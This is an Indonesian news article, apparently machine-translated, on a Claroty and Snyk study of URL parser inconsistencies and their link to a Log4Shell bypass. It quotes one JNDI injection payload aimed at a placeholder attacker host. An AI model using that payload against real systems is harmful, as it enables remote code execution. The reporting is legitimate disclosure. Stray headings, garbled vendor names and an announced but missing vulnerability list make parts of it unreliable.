Peneliti Menemukan Bug di Lebih dari Selusin Perpustakaan Parser URL yang Banyak Digunakan

  • Whatsapp
Peneliti Menemukan Bug di Lebih dari Selusin Perpustakaan Parser URL yang Banyak Digunakan
Peneliti Menemukan Bug di Lebih dari Selusin Perpustakaan Parser URL

News.nextcloud.asia –

Sebuah studi dari 16 Uniform Resource Locator yang berbeda (URL) perpustakaan parsing telah menemukan inkonsistensi dan kebingungan yang dapat dimanfaatkan untuk melewati validasi dan membuka pintu ke berbagai vektor serangan.

Dalam analisis mendalam yang dilakukan bersama oleh perusahaan keamanan siber kejelasan dan Synk, delapan kerentanan keamanan diidentifikasi di banyak perpustakaan pihak ketiga yang ditulis dalam bahasa C, JavaScript, PHP, Python, dan Ruby dan digunakan oleh beberapa aplikasi web.

“Kebingungan dalam penguraian URL dapat menyebabkan perilaku tak terduga dalam perangkat lunak (misalnya, aplikasi web), dan dapat dimanfaatkan oleh pelaku ancaman untuk menyebabkan kondisi penolakan layanan, kebocoran informasi, atau kemungkinan melakukan serangan eksekusi kode jarak jauh,” para peneliti kata dalam sebuah laporan yang dibagikan dengan The Hacker News.

Dengan URL menjadi mekanisme mendasar di mana sumber daya — yang terletak baik secara lokal maupun di web — dapat diminta dan diambil, perbedaan dalam cara pustaka parsing menafsirkan permintaan URL dapat menimbulkan risiko signifikan bagi pengguna.

Pencadangan GitHub Otomatis

Contoh kasusnya adalah kelemahan Log4Shell kritis yang diungkapkan bulan lalu di kerangka kerja logging Log4j di mana-mana, yang berasal dari fakta bahwa string jahat yang dikendalikan penyerang, ketika dievaluasi sebagai dan ketika sedang dicatat oleh aplikasi yang rentan, menghasilkan JNDI pencarian yang terhubung ke server yang dioperasikan musuh dan mengeksekusi kode Java arbitrer.

Meskipun Apache Software Foundation (ASF) dengan cepat melakukan perbaikan untuk mengatasi kelemahan tersebut, segera muncul bahwa mitigasi dapat dilewati oleh input yang dibuat khusus dalam format “${jndi:ldap://127.0.0[.]1#.evilhost.com:1389/a}” yang sekali lagi mengizinkan pencarian JNDI jarak jauh untuk mencapai eksekusi kode.

“Pintasan ini berasal dari fakta bahwa dua pengurai URL (!) yang berbeda digunakan di dalam proses pencarian JNDI, satu pengurai untuk memvalidasi URL, dan satu lagi untuk mengambilnya, dan bergantung pada bagaimana setiap pengurai memperlakukan bagian Fragmen (#) dari URL, Otoritas juga berubah,” kata para peneliti.

Khususnya, jika input diperlakukan sebagai URL HTTP biasa, Wewenang komponen — kombinasi nama domain dan nomor port — berakhir setelah menemukan pengidentifikasi fragmen, sedangkan, ketika diperlakukan sebagai URL LDAP, pengurai akan menetapkan keseluruhan “127.0.0[.]1#.evilhost.com:1389” sebagai Otoritas karena spesifikasi URL LDP tidak memperhitungkan fragmen.

Memang, penggunaan beberapa parser muncul sebagai salah satu dari dua alasan utama mengapa delapan kerentanan ditemukan, yang lainnya adalah masalah yang timbul dari inkonsistensi ketika perpustakaan mengikuti spesifikasi URL yang berbeda, secara efektif memperkenalkan celah yang dapat dieksploitasi.

Disonansi berkisar dari kebingungan yang melibatkan URL yang mengandung garis miring terbalik (“”), jumlah garis miring yang tidak teratur (misalnya, https:///www.example[.]com), atau Data yang disandikan URL (“%”) ke URL dengan skema URL yang hilang, yang dapat dieksploitasi untuk mendapatkan eksekusi kode jarak jauh atau bahkan tahap penolakan-atau-layanan (DoS) dan serangan phishing pengalihan terbuka.

Mencegah Pelanggaran Data

Daftar delapan kerentanan yang ditemukan adalah sebagai berikut, yang semuanya telah ditangani oleh pengelola masing-masing —

“Banyak skenario serangan di kehidupan nyata dapat muncul dari penguraian primitif yang berbeda,” kata para peneliti. Untuk melindungi aplikasi dari kerentanan penguraian URL, “perlu untuk sepenuhnya memahami pengurai mana yang terlibat dalam keseluruhan proses. [and] perbedaan antara parser, baik itu kelonggaran mereka, bagaimana mereka menafsirkan URL yang salah bentuk yang berbeda, dan jenis URL apa yang mereka dukung.”

.

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.